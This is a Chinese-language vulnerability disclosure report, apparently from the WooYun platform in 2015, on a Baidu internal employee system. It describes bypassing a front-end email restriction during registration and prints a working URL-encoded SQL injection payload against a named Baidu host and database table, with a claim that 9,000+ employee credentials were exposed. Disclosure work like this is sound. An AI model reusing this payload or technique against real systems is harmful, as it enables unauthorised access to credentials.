漏洞概要
关注数(24)
关注此漏洞
漏洞标题:百度某内部系统存在逻辑漏洞及SQL注入(导致9000多员工账号密码泄露)
相关厂商:百度
提交时间:2015-05-19 13:31
修复时间:2015-07-05 16:10
公开时间:2015-07-05 16:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-21: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开
简要描述:
杀器在手,天下我有!
详细说明:
http://weixin.family.baidu.com/index.php/site/login
这个是百度family,注册的时候限定只能百度邮箱,但是只是前端验证,可以绕过
绕过直接注册一个qq邮箱的账号
收到激活码。激活即可登陆成功,
登陆成功以后,找到一个注入:
漏洞证明:
注入,可以跑账号密码,仅测试少量数据。
密码
9000多用户啊
http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,%28SELECT%20count%28*%29%20FROM%20FOTSRbdBZydSEIvukDVz.user%29,4%20--%20;
修复方案:
版权声明:转载请注明来源 杀器王子@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2015-05-21 16:09
厂商回复:
感谢白帽子
最新状态:
暂无